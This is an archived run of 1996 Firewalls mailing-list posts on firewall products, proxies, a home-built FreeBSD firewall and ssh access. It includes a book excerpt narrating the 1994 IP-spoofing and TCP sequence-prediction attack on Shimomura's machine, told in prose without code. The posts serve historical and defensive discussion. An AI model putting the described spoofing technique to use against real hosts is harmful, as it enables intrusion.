Received: (jya@localhost) by pipe4.nyc.pipeline.com (8.6.9/8.6.9) id IAA02811; Mon, 8 Jan 1996 08:25:06 -0500 Date: Mon, 8 Jan 1996 08:25:06 -0500 Message-Id: <199601081325.IAA02811@pipe4.nyc.pipeline.com> To: firewalls@GreatCircle.com Cc: frankw@in.net Subject: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Responding to msg by frankw@in.net (Frank Willoughby) on Sun, 7 Jan 11:41 PM Two clarifications of the post by Frank Willoughby on the TCP/IP attack described in Jonathan's Littman new book: 1. The material posted is directly from Littman's book, not my paraphrase. 2. The attacker has not been proven to be Mitnick, only alleged. Whether it was Mitnick is a principal question of Littman's book. From firewalls-owner Mon Jan 8 06:50:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA05788 for firewalls-outgoing; Mon, 8 Jan 1996 06:22:30 -0800 (PST) Received: from dsn20 ([164.167.138.20]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA05775 for ; Mon, 8 Jan 1996 06:22:18 -0800 (PST) Received: from [164.167.86.100] by dsn20 (5.59/25-eef) id AA15571; Mon, 8 Jan 96 08:47:35 EST Message-Id: <9601081347.AA15571@dsn20> Comments: Authenticated sender is From: "Bob Resino" To: grau@muc.de, firewalls@GreatCircle.COM Date: Mon, 8 Jan 1996 09:18:24 +0000 Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7BIT Subject: Re: Off-Topic: Selling Firewalls Reply-To: pnh1rgr@mclo10.med.navy.mil X-Mailer: Pegasus Mail for Windows (v2.10) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Please don't flame me for this (possibly) off-topic question, but I > think, the best answer for my question is with the members of this great list. > > I started working for a VAR of firewalls and other network related > products. When it comes to writing proposals, I feel there must be > tools to effectively support the selling process > > - how to draw network designs > - how to calculate network topology, eg. IP-numbers and netmasks > - how to calculate the costs for the equipment (firewalls, routers ...) > - how to ... > > How do you network consultants and reseller work out there, how do > you make your life easier when it comes to desktop work. I feel > there are better tools than M$-Word or Powerpoint to generate good > proposals and solutions. > > TIA, Andreas > -- Andreas Grau grau@muc.de > You might want to think about a CAD package, like Intergraph Microstation or IsiCad. The Microstation poduct has links to several database formats and there are several cell libraries for data-comms available. With Windows ODCB, this data can be incorporated into Excel, Word and/or Powerpoint. I have used IsiCad to do network maps and updates for HP OpenView. I guess it depends on what your looking for. Bob Resino (RGR24) Head, MID/Data-telecommunications 804-398-7400 x322 MCLO, HSO, Norfolk, VA (US Navy) Fax 804-398-7265 pnh1rgr@mclo10.med.navy.mil From firewalls-owner Mon Jan 8 07:14:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA06745 for firewalls-outgoing; Mon, 8 Jan 1996 07:04:34 -0800 (PST) Received: from emh.ramstein.af.mil (emh.ramstein.af.mil [132.25.130.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA06731 for ; Mon, 8 Jan 1996 07:04:29 -0800 (PST) Received: from outgate.ramstein.af.mil by emh.ramstein.af.mil with SMTP (1.37.109.16/16.2) id AA115153485; Mon, 8 Jan 1996 16:04:45 +0100 Received: by outgate.ramstein.af.mil with Microsoft Mail id <30F1B0F4@outgate.ramstein.af.mil>; Mon, 08 Jan 96 16:04:04 PST From: Hescock Brian TSgt 786CS/SCNBN To: firewalls Subject: firewall reviews/comparisons Date: Mon, 08 Jan 96 16:00:00 PST Message-Id: <30F1B0F4@outgate.ramstein.af.mil> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I just subscribed to your mail list today so please forgive my first question: 1) Which software is required to view the .Z files and where can I get it? 2) I've been searching for information on the best firewall to purchase for our needs and have not come across any reviews/comparisons on which is best (I have a list of all of the firewalls available and their descriptions but not any comparisons). Anyone know of any reviews and where to find them? We require a firewall which would could support a very high throughput so we would probably require a hardware-based firewall. Configuring our front-end router to act as a firewall isn't a practical option. Any information would be appreciated. Thanks, Brian Hescock hescockb@86aw4.ramstein.af.mil From firewalls-owner Mon Jan 8 10:01:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA11194 for firewalls-outgoing; Mon, 8 Jan 1996 09:56:09 -0800 (PST) Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id JAA11189 for ; Mon, 8 Jan 1996 09:56:05 -0800 (PST) Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id LAA17201; Mon, 8 Jan 1996 11:55:08 -0600 (CST) Received: from sphinx.sctc.com (sphinx.sctc.com [172.17.192.3]) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id LAA17190; Mon, 8 Jan 1996 11:55:03 -0600 (CST) Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by sphinx.sctc.com (8.7.1/8.6.10) with SMTP id LAA09147; Mon, 8 Jan 1996 11:55:38 -0600 (CST) Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id LAA21565; Mon, 8 Jan 1996 11:55:39 -0600 Date: Mon, 8 Jan 1996 11:55:39 -0600 From: Rick Smith Message-Id: <199601081755.LAA21565@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com, mckenney@smiley.mitre.org Subject: Re: SSL and S-HTTP Proxy support Sender: firewalls-owner@GreatCircle.COM Precedence: bulk mckenney@smiley.mitre.org (Brian W. McKenney) writes: >I would like to have an update as to which commercial firewall vendors >support or plan to support (when) an SSL and/or S-HTTP proxy. I will post >a summary. The answer depends on what you're trying to do. If you're trying to let clients residing on a protected internal net browse an external, less trustworthy net (the Internet) then all the major firewalls should provide similar service, including our Sidewinder. The service is based on a generic proxy that tunnels the traffic through the firewall. Some firewalls (like Sidewinder) can apply access controls as follows: 1) permit/deny traffic according to source IP address. 2) permit/deny traffic according to destination IP address. 3) restrict to inbound only or outbound only. 4) require login/password from browser. All except 4) are generic proxy controls and not specific to Web service. As far as I know, *nobody* actually cracks the SSL at the firewall and applies access control on the crypto credentials being passed. With today's Netscape browsers, of course, this can only authenticate the server being accessed, not the client. I don't know of anyone doing this with SHTTP, either. If anyone does, I'd be interested to hear what security objectives are involved and what mechanism is used. If, on the other hand, you need to provide Web service to clients on a potentially hostile external network (the Internet) then existing proxy techniques aren't going to protect you much. You need to host the Web service on a platform capable of resisting sophisticated attacks. That's a different problem. Rick. smith@sctc.com secure computing corporation From firewalls-owner Mon Jan 8 10:44:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA11383 for firewalls-outgoing; Mon, 8 Jan 1996 10:03:14 -0800 (PST) Received: from emmalani.queens.hawaii.org ([168.105.7.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA11365 for ; Mon, 8 Jan 1996 10:02:53 -0800 (PST) Received: from smtp.queens.hawaii.org by emmalani.queens.hawaii.org (AIX 3.2/UCB 5.64/4.03) id AA06154; Mon, 8 Jan 1996 07:50:45 -1000 Received: from QMC-Message_Server by QUEENS.HAWAII.ORG with Novell_GroupWise; Mon, 08 Jan 1996 07:59:11 -1000 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Mon, 08 Jan 1996 07:56:01 -1000 From: DARRYL PANG To: Firewalls@GreatCircle.COM Subject: Firewalls-Digest V5 #8 -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk FYI gang. And "NO" we are NEVER going to use FreeBSD!! Mahalo, DPP. \m/ ^_^ \m/ ++++++++++++++++++++++++++++++++++++ A Manager does the thing right. A Leader does the right thing. ++++++++++++++++++++++++++++++++++++ >>> 01/05/96 11:00pm >>> Firewalls-Digest Saturday, 6 January 1996 Volume 05 : Number 008 In this issue: SSL and S-HTTP Proxy support Re: Security managing Cisco Routers Re: SSL and S-HTTP Proxy support Steps in building a firewall, Right or Wrong? See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues. ---------------------------------------------------------------------- From: cbk@ingress.com (Charles B. Kaplan) Date: Fri, 5 Jan 1996 23:21:13 -0500 Subject: SSL and S-HTTP Proxy support >From what I remember S-HTTP can be fully negotiated within the 'standard' HTTP ports/protocol. Therefor any proxy supporting HTTP should work with S-HTTP. Next, while SSL COULD be implimented accross multiple protocols, etc, the 'only' wide spread use presentally is via netscape, and that makes use of port 443 'normally'. The BorderWare Firewall Server, from BNTI out of the box proxys port 80, 8001, 8080, and 443, all when its WWW proxy is enabled. I don't see why however you couldn't say use plug-gw on port 443 to do the same types of things. NOTE however, putting your web server inside your firewall, and then proxying to it is a BIG risk. That ofcourse is why BorderWare provides a 3'rd network interface for 'secured servers'. Well, enough plugging of BorderWare....if you didn't guess I resell it. Anyone care to either veryify or correct the above S-HTTP notes ? - -Charles Kaplan for more information on BorderWare call 800-254-7159 ------------------------------ From: Bill Husler Date: Fri, 5 Jan 1996 20:22:58 -0800 Subject: Re: Security managing Cisco Routers >>>At 02:15 PM 12/27/95 GMT, Pietro wrote: >>> >>>>My actual problem is to managed several Cisco Routers situated >>>>on a public network from a central site, from where there is no >>>>way to garantee secure communication. >>>> > >>I have heard that Firewall-1 will manage the configurations of CISCO >>routers remotely. I believe the way it works is that you set up the >>configuration or a Firewall-1 Administrative Workstations and it send >>some sort of encrypted/secured transmission to the router to downlowd the >>new config. >>Bill >> > >Although I'm not intimately familiar with the internal mechanisms of >Firewall-1, I do have a problem with the above paragraph, since we >do not (yet) support encrypted transport mechanisms. :-) > >- paul > >-- >Paul Ferguson || || >Consulting Engineering || || >Reston, Virginia USA |||| |||| >tel: +1.703.716.9538 ..:||||||:..:||||||:.. >e-mail: pferguso@cisco.com c i s c o S y s t e m s > > Paul, Your absolutely right! I talked to our Firewall-1 dudes (actually SUN) and they said that communication is in the clear. I don't know what I heard that made me believe otherwise. Sorry if I muddied the waters. I also asked them to describe why we should have "warm fuzzies" that the changes being made to the router configuration are indeed being sent from the FW-1 admin and not some admin wannabe. I will post their response. Bill ------------------------------ From: Bill Husler Date: Fri, 5 Jan 1996 20:46:16 -0800 Subject: Re: SSL and S-HTTP Proxy support >From: Brian W. McKenney, mckenney@smiley.mitre.org > >I would like to have an update as to which commercial firewall vendors >support or plan to support (when) an SSL and/or S-HTTP proxy. I will post >a summary. > >This is the information that I have: > >1. TIS Gauntlet: SSL annd S-HTTP proxies in next release. >2. KarlBridge/KarlBrouter: S-HTTP proxy >3. Milkyway Blackhole: S--HTTP >4. SOS Brimstone: S-HTTP proxy >5. Technologic Interceptor: S-HTTP proxy >6. V-One SmartWall: S-HTTP proxy > >License versions of TIS Gauntlet will support whatever the next Gauntlet >release supports. > You can add ANS Interlock to you list. Bill ------------------------------ From: bart@pu.com (Bart Rivard) Date: Sat, 6 Jan 1996 01:49:18 -0600 Subject: Steps in building a firewall, Right or Wrong? Hi, I think one of the things about building a firewall that has surprised me is how really simple it really is. It makes me wonder if I have done something wrong. Many people say use the TIS toolkit but I really don't see any reason. Here is the steps I have taken tell me what you think. 1) Installed FreeBSD on a Pentium 100 with 32 MB of Ram and two Ethernet NICs 2) Configured the Kernel such that IP forwarding and Source routing are disabled. 3) Deleted all accounts on the system except root 4) Gave root a password with number, letters, uppercase and lowercase, 10 long 5) Deleted everything out of inetd.conf except DNS 6) Configured DNS so that the only machine it knows about is a Web server which is in the DMZ and the firewall machine and wildcard MX record. 7) Configured resolv.conf on firewall to point to the internal network DNS. 8) Turned off source routing on the CISCO 2500 router and added filters which disabled all UDP traffic except port DNS/53, all TCP inbound traffic except SMTP to firewall, News from specific news server to firewall http to web server in DMZ. Allow all outbound TCP traffic. Thinking about disabling all ICMP traffic on router, what do you think? 9) Configured CERN web server as a proxy on the firewall using a weird port number. Wrapped the port with TCP Wrappers and only allow access from internal IP addresses. Internal IP addresses are 192.168.0.0 thru 192.168.255.255. Wish I could limit access to web proxy by network interface but don't know how? 10)Modified a mail program so that it read mail from port 25 and writes to disk mail messages. Completely dumb program. Does not handle distribution list, aliases or anything. I then pick mail up off of disk and send it to internal CC mail gateway. Was there shareware to do equivalent? Can sendmail pick mail up off of disk? Is it safe to have sendmail pick mail up off of disk and distribute? 11)Put TCP Wrapper around news server port to only except connection from our news provider at AT&T and internal network. Also use inn access control to limit access from internal network for reading news and news provider for dumping news. Well that about it. We provide outbound Web, Gopher, FTP and WAIS through the CERN Proxy. Is this safe? We don't allow any UDP to pass firewall. We don't allow anything to come in from the outside through the firewall except mail. The firewall doubles as a news server so we don't allow news to pass through firewall but the firewall doubles as a news server. Is it safe to use a firewall as a news server? Please comment!! Send all comments to bart@pu.com. TIA, Bart ------------------------------ End of Firewalls-Digest V5 #8 ***************************** To unsubscribe from Firewalls-Digest, send the following command in the body of a message to "Majordomo@GreatCircle.COM": unsubscribe firewalls-digest To subscribe, send the command "subscribe firewalls-digest" instead. If you want to subscribe or unsubscribe something other than the account the mail is coming from, such as a local redistribution list, then append that address to the command; for example, to subscribe "local-firewalls": subscribe firewalls-digest local-firewalls@your.domain.net A non-digest (direct mail) version of this list is also available; to subscribe to that instead, replace all instances of "firewalls-digest" in the commands above with "firewalls". Compressed back issues are available for anonymous FTP from FTP.GreatCircle.COM, in pub/firewalls/digest/vNN.nMMM.Z (where "NN" is the volume number, and "MMM" is the issue number). From firewalls-owner Mon Jan 8 13:30:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA16064 for firewalls-outgoing; Mon, 8 Jan 1996 13:00:40 -0800 (PST) Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA23625 for ; Sun, 7 Jan 1996 20:42:26 -0800 (PST) Received: from pm4-20.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA17466; Sun, 7 Jan 96 23:41:31 -0500 Date: Sun, 7 Jan 96 23:41:31 -0500 Message-Id: <9601080441.AA17466@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com From: frankw@in.net (Frank Willoughby) Subject: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) Cc: John Young Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The following mail was posted on the Cypherpunks mailing list by John Young (whose name appears on the cc:). I have his permission to post his mail here. John mentioned that he was curious about responses to his posting in this mailing list, so I would like to request that you cc: him in your replies to this thread. Also, John mentioned that the info cited in his posting is extracted from Jonathan Littman's book: Jonathan Littman, an investigative reporter, has published "The Fugitive Game: Online With Kevin Mitnick," Little Brown, 1996. 381 pp. $23.95. ISBN 0-316-52858-7. The relevance of the text to the firewalls mailing list is fairly obvious as it describes the operation of the TCP Sequence Number Prediction Attack used by Mitnick to break into Tsutomu Shimomura's computer. A number of people have sent me mails or called me about my previous postings on TCP Sequence Number Prediction Attacks. This mail should help to fill in some of the blanks on the subject. FWIW, I still maintain that this is a vulnerability in a number of firewalls (but then again, that's another thread). Enjoy. Best Regards, Frank PS - Stay tuned to my home page for some interesting free stuff in a day or two. Fortified Networks Inc. - Management & Information Security Consulting Phone: (317) 573-0800 - http://www.fortified.com/fortified/ The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. ------------8< cut here 8<--------------------------------------------- Return-Path: From: John Young Date: Sun, 7 Jan 1996 15:43:02 -0500 To: cypherpunks@toad.com Subject: Toad Hop Sender: owner-cypherpunks@toad.com Precedence: bulk X-UIDL: 821054482.004 [Before it is publicized, KM describes for Littman the Christmas 1994 attack on Shimomura's systems as a "TCP/IP prediction packet attack." (. . .) below are by Littman.] Three days later, on January 23, Shimomura will describe the attack in a widely distributed public Internet post. IP source address spoofing and TCP/IP sequence number prediction are the technical terms Shimomura uses to describe it, much like Mitnick's description. But his analysis is extremely technical, and even some UNIX security experts find it tough going. That same day, about 2 P.M., CERT will blast out an advisory to its international mailing list of 12,000 Internet sites in the United States, Germany, Australia, the United Kingdom, Japan, and other countries. The vaguely worded report is much less specific than Mitnick's one-minute explanation on the telephone. Most likely, CERT is trying to provide enough detail so Internet sites can protect themselves against future attacks without providing so much detail that it could encourage copycat attacks. On one level, the hack is simple, a clever strike at a basic weakness of the Internet. Computers on the Internet are often programmed to trust other computers. The Internet was created to share information, and the attack on Shimomura, just like the Robert Morris Internet Worm attack seven years before, exploits that trust. The Internet has its own way of sending e-mail or files. Messages or files are split into smaller digital chunks or packets, each with its own envelope and address. When each message is sent, it's like a flock of birds that migrates to a planned location and reunites as a flock at the destination. Computers on the Internet often act like great flocks of birds that trust one another too. And all it takes is one enemy bird to infiltrate the flock. . . . On Christmas Day 1994 the attack begins. First, the intruder breaks into a California Internet site that bears the cryptic name toad.com. Working from this machine, the intruder issues seven commands to see who's logged on to Shimomura's workstation, and if he's sharing files with other machines. Finger is one of the common UNIX commands the intruder uses to probe Shimomura's machine. As a security professional Shimomura should have disabled the feature. Finger is so commonly used by hackers to begin attacks that 75 percent of Internet sites, or about 15 million of the more than 20 million Internet users, block its function to increase security. The intruder's making judgment calls on the fly about which commands will help him uncover which machines Shimomura's workstation might trust. He works fast. In six minutes he deduces the pattern of trust between Shimomura's UNIX workstation and an unknown Internet server. Then the automatic spoofing attack begins. It will all be over in sixteen seconds. The prediction packet attack program fires off a flurry of packets to busy out the trusted Internet server so it can't respond. Next, the program sends twenty more packets to Shimomura's UNIX workstation. The program is looking for a pattern in the initial sequence numbers -- the numbers used to acknowledge receipt of data during communications. The program deciphers the returned packets by subtracting each sequence number from the previous one. It notes that each new initial sequence number has grown by exactly 128,000. The program has unlocked the sequence number key. Shimomura's machine has to be idle for the attack to succeed. New Internet connections would change the initial sequence number and make it more difficult to predict the key. That's why the hacker attacks on Christmas Day. The attack program sends packets that appear to be coming from the trusted machine. The packet's return or source address is the trusted machine's Internet address. Shimomura's workstation sends a packet back to the trusted machine with its initial sequence number. But flooded by the earlier flurry of packets, the trusted server is still trying to handle the earlier traffic. It's tangled up. Taking advantage of the gagged server, the attacking program sends a fake acknowledgment. It looks real because it's got the source address of the trusted server, and the correct initial sequence number. Shimomura's workstation is duped. It believes it's communicating with a trusted server. Now the attacking program tells Shimomura's obedient workstation to trust everyone. It issues the simple UNIX "Echo" command to instruct Shimomura's workstation to trust the entire Internet. At that point, Shimomura's personal and government files are open game to the world. It's more than a humiliating blow to the security expert. By making Shimomura's machine accessible from any Internet site, the intruder has masked his own location. He can return from anywhere. The hacker can't believe his good luck. The attack is only successful because Shimomura has not disabled the "R" commands, three basic commands that allow users to remotely log-in or execute programs without a password. Tens of thousands of security-conscious Internet sites, representing well over a million users, routinely block access to the R commands to avoid its well publicized abuse by hackers. It takes a few keystrokes and about thirty seconds to shut off the R commands on an Internet server. You don't even have to turn off the machine. Why didn't Shimomura do it? . . . Mitnick laughs. "He's [Shimomura's] not happy. I have nothing to do with it. I'm just telling you what I hear through the grapevine." [Littman] "Who do you think might have done it?" I ask the likely suspect. "How did he figure it out himself?" "He [Shimomura] realized that somebody had edited his wrapper log, which shows incoming connections. Somebody actually modified those logs, and then he was able to reconstruct what happened through these logs that were mailed to another site unbeknownst to the intruder." Mitnick's actually telling me the evidence Shimomura collected to figure out the attack. The wrapper is supposed to control connections to Shimomura's server and log all connection attempts. It failed to protect Shimomura but still it logged the hacker's spoofed connection, and a copy of the log was e-mailed off-site. "So you were asking me if there's a secure e-mail site?" Mitnick continues, his voice suddenly hard. "My answer is no. This guy in my estimation is the brightest in security on the whole Internet. He blows people like Neil Clift away. I have a lot of respect for this guy. 'Cuz I know a lot about him. He doesn't know anything about me, hopefully, but he's good. "On the Internet, he's one of the best in the world." [pp. 222-25] ----- [KM] "I don't know what his motive is. I don't know the man at all. Alls I know is he's very technical and he's very good at what he does. He's in the top five." [JL] "What makes Shimomura so good?" [M] "When someone penetrates his system he knows what to look for. When you compile a program, it uses external files and libraries. This is the type of guy that would look at the access times of the files to try to figure out what type of program somebody was compiling. The guy's sharp." On UNIX systems it's possible to tell the last time a file was read. Mitnick's guessing that Shimomura could determine the type of application that was compiled (converted into the computer's most basic machine language) by examining the date stamps in certain system directories. He's also acknowledging he knows that the intruder compiled a program while he was on Shimomura's machine. Once again, Kevin Mitnick seems to have an amazing amount of detail on how Shimomura analyzes an attack. [M] "He's just very good at -- well, he's a spook. What do you expect? This is only what I hear in the grapevine." ... [L] "But does the grapevine say he's primarily a spook?" [M] "Unknown. He's good in security and he consults with companies like Trusted Information Systems, the people that develop Internet fire walls, and a lot of people in D.C. and the Virginia area." Trusted Information -- the name strikes a bell. Markoff quoted someone from Trusted Information in his front-page "Data Threat" article. [L] "Where is Trusted Information?" [M] "Oh, in Maryland, 301 area code. Baltimore, I believe." [L] "What are some of the Virginia companies Shimomura works with?" [M] "I just have the phone numbers," Mitnick reveals casually. "I haven't called them yet to see." [pp. 252-53] ----- Why not ask John Markoff about the real reason he called me twice this morning? So I ask him about the Shimomura Newsweek story, and the odd reference to cellular phones. He comes back with a stunning revelation. "Somebody hit a different Tsutomu machine last summer and the NSA was pissed," Markoff tells me. "They freaked out. There's no question about it." Why didn't he mention this in his New York Times stories? Why create the false appearance Shimomura was first hacked Christmas Day? "But it was a different machine?" I ask. "Am I being interviewed here?" It strikes me as an odd question. Markoff was the one who called me twice in the space of an hour. Who's interviewing whom? "Let's get on the same wavelength," Markoff suggests. "I'm glad to share this stuff with you, but I want to know where it's going to show up. 'Cuz I'm pretty close to Shimo and it's an issue for me." Before I can respond, he starts talking about Shimomura again. "I wrote that profile of Tsutomu because after I mentioned him in the bottom of my story ["Data Threat"] I basically outed him and a million reporters were all over him." "He wasn't happy about that?" "No, Tsutomu loves it," Markoff says. "He's playing his own games. "I'II tell you it's unclear what was taken [referring to the Christmas hack], and point two, I can send you a public posting by an Air Force information warfare guy who described what was taken and their assessment of the damage. "And there are lots of little snips of code that a brilliant hacker could probably use. But Tsutomu's mind works in very cryptic ways. It's not clear that without Tsutomu you're going to be able to do anything with it. "Now in this break-in I don't actually think a lot of stuff was taken." This break-in? Just how many times was Shimomura hacked before Christmas? But I ask a different question. "Why would an Air Force guy post something?" "Oh, Tsutomu," Markoff casually replies. "He produced a lot of software for the Air Force." "Where would he post this?" "Oh, to a mailing list. A lot of people were concerned about what was taken from his [Shimomura's] machine. What they [the hacker] got was a lot of his electronic mail. Some of it's kind of embarrassing. [But] I don't think people are going to find new ways to attack the network based on this particular attack. "There is another issue," Markoff cautions in a serious tone. "Tsutomu is a very sharp guy, and it is not impossible that that was a bait machine, which is why I stayed away from the issue." Is Markoff implying Shimomura, a rumored NSA spy, laid a trap? And what about Markoff's New York Times articles? Were they part of the trap, too? "Think about it for a second," Markoff pauses dramatically. "And you get into this wilderness-of-mirrors kind of world. And a lot of people that are writing don't know everything, and I don't know everything. "I've been protecting him [Shimomura] for five years. I get the profile and the [Wall Street] Journal is on him. They don't know how close he is to the military. It would make perfect sense. Who knows what's on the code? The guy is in the counterintelligence business." [pp. 258-60] From firewalls-owner Mon Jan 8 13:34:52 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA16438 for firewalls-outgoing; Mon, 8 Jan 1996 13:21:00 -0800 (PST) Received: from sivka.carrier.kiev.ua (sivka.carrier.kiev.ua [193.125.68.130]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA16423 for ; Mon, 8 Jan 1996 13:20:48 -0800 (PST) Received: from elvisti.kiev.ua (uucp@localhost) by sivka.carrier.kiev.ua (Sendmail 8.who.cares/5) with UUCP id XAA11330 for Firewalls@GreatCircle.COM; Mon, 8 Jan 1996 23:21:00 +0200 Received: from office.elvisti.kiev.ua (office.elvisti.kiev.ua [193.125.28.33]) by spider2.elvisti.kiev.ua (8.6.12/8.ElVisti) with ESMTP id XAA19991 for ; Mon, 8 Jan 1996 23:24:57 +0200 Received: (from stesin@localhost) by office.elvisti.kiev.ua (8.6.12/8.ElVisti) id XAA17001; Mon, 8 Jan 1996 23:24:56 +0200 From: "Andrew V. Stesin" Message-Id: <199601082124.XAA17001@office.elvisti.kiev.ua> Subject: Re: Firewalls-Digest V5 #8 -Reply To: DPANG@QUEENS.HAWAII.ORG (DARRYL PANG) Date: Mon, 8 Jan 1996 23:24:55 +0200 (EET) Cc: Firewalls@GreatCircle.COM In-Reply-To: from "DARRYL PANG" at Jan 8, 96 07:56:01 am X-Mailer: ELM [version 2.4 PL24alpha5] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, # # FYI gang. And "NO" we are NEVER going to use # FreeBSD!! # Wouldn't you mind commenting your point with a bit more details, please? # # Mahalo, DPP. \m/ ^_^ \m/ # # ++++++++++++++++++++++++++++++++++++ # A Manager does the thing right. # A Leader does the right thing. # ++++++++++++++++++++++++++++++++++++ # [... the only mention about FreeBSD here -- a story from bart@pu.com -- skipped; what's wrong with it, anyway? ...] -- With best regards -- Andrew Stesin. +380 (44) 2760188 +380 (44) 2713457 +380 (44) 2713560 An undocumented feature is a coding error. From firewalls-owner Mon Jan 8 18:14:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA22203 for firewalls-outgoing; Mon, 8 Jan 1996 18:08:58 -0800 (PST) Received: from mercury.tdb.gov.sg ([202.42.225.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA22198 for ; Mon, 8 Jan 1996 18:08:53 -0800 (PST) Received: (from mail@localhost) by mercury.tdb.gov.sg (8.6.12/8.6.12) id KAA08391 for ; Tue, 9 Jan 1996 10:08:07 +0800 Received: from smtpgw.tdb.gov.sg(202.42.225.225) by mercury.tdb.gov.sg via smap (V1.3) id sma015554; Tue Jan 9 10:07:49 1996 Received: by smtpgw.tdb.gov.sg with Microsoft Mail id <30F2AF7E@smtpgw.tdb.gov.sg>; Tue, 09 Jan 96 10:10:06 PST From: James Soh To: "'smtp:Firewalls@GreatCircle.COM'" Subject: Fw License Date: Tue, 01 Jan 80 17:44:00 PST Message-ID: <30F2AF7E@smtpgw.tdb.gov.sg> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is the Fw-license based on the number of internal IP addresses it protects? If our organisation has exceeded this IP protection, according to sources, it is unenforcible now, how will the FW behaves? Thanks. From firewalls-owner Mon Jan 8 20:44:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA24711 for firewalls-outgoing; Mon, 8 Jan 1996 20:40:48 -0800 (PST) Received: from torres.nixltd.com.au (nautronix.com.au [203.9.79.137]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id UAA24706 for ; Mon, 8 Jan 1996 20:40:42 -0800 (PST) Received: (from uucp@localhost) by torres.nixltd.com.au (8.7.3/8.6.9) id MAA05450 for ; Tue, 9 Jan 1996 12:48:35 +0800 Received: from medusa.nixltd.com.au(192.9.200.15) by torres.nixltd.com.au via smap (V1.3) id sma005447; Tue Jan 9 12:48:08 1996 Received: by medusa.nautronix.com.au (4.1/SMI-4.1) id AA02927; Tue, 9 Jan 96 12:37:56 WST Date: Tue, 9 Jan 96 12:37:56 WST From: carl.johnson@nautronix.com.au (Carl Johnson) Message-Id: <9601090437.AA02927@medusa.nautronix.com.au> To: firewalls@greatcircle.com Subject: ssh Cc: harry.protoolis@nautronix.com.au Sender: firewalls-owner@GreatCircle.COM Precedence: bulk hi all, we're thinking of using ssh to allow users to login to our internal network via our firewall (fwtk), i.e we'll plug outside ssh connections straight thru to an internal machine running the sshd, whereupon the normal ssh authentication will happen. has anyone had (or can think of) any problems/bugs/holes etc with doing this? c From firewalls-owner Tue Jan 9 01:44:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA00693 for firewalls-outgoing; Tue, 9 Jan 1996 01:25:36 -0800 (PST) Received: from gw.rmcs.cranfield.ac.uk (gw.rmcs.cranfield.ac.uk [193.63.243.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id BAA00683 for ; Tue, 9 Jan 1996 01:24:00 -0800 (PST) Date: Tue, 9 Jan 1996 9:22:49 GMT From: Neil To: firewalls@greatcircle.com Message-Id: <960109092249.2abf@rmcs.cranfield.ac.uk> Subject: RE: firewalls reviews/comparisons Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I just subscribed to your mail list today so please forgive my first > question: > 1) Which software is required to view the .Z files and where can I get it? uncompress wil do the trick, it comes as part of any standard unix setup. Do uncompress . > 2) I've been searching for information on the best firewall to purchase for > our > needs and have not come across any reviews/comparisons on which is > best (I have a list of all of the firewalls available and their descriptions > but > not any comparisons). Anyone know of any reviews and where to find them? > We require a firewall which would could support a very high throughput so > we would probably require a hardware-based firewall. Configuring our > front-end router to act as a firewall isn't a practical option. Any > information would be > appreciated. Thanks, There was a review of commercial firewalls in (I think) Byte or something like that a little while ago, the machines being the TIS Gauntlet, Border Ware and Firewall 1. Perhaps someone with a better memory than me can clarify. > Brian Hescock > hescockb@86aw4.ramstein.af.mil Yours Aye, Neil * Neil A Carson * The Royal Military College of Science, Shrivenham * e-mail carson@rmcs.cranfield.ac.uk * Address: Kitchener Mess, RMCS, Shrivenham SN6 8LA. Tel: (01793) 784428 (Home) From firewalls-owner Tue Jan 9 04:14:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA03324 for firewalls-outgoing; Tue, 9 Jan 1996 04:02:34 -0800 (PST) Received: from 